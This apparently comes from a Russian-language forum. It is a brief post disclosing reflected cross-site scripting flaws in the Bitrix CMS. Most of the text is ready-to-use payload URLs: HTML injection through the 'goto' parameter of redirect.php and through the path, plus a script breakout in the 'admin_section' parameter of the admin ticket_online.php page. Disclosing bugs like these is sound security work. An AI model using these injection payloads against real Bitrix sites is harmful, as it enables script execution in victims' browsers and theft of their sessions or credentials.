http://site.net/bitrix/redirect.php?event1=pofig&event2=pofig&event3=pofig&goto="><h1>XSS
(или http://site.net/bitrix/"><h1>xexe)

ерунда, конечно, но всё-таки...
и я вновь и вновь извиняюсь, если это уже не свежая инфа...

тоже еще одна хсс в самой же админки после капчи
/bitrix/admin/ticket_online.php?ticket_id=1&owner_user_id=77&lang=&online_auto_refresh=999&admin_section=N'},17);alert()//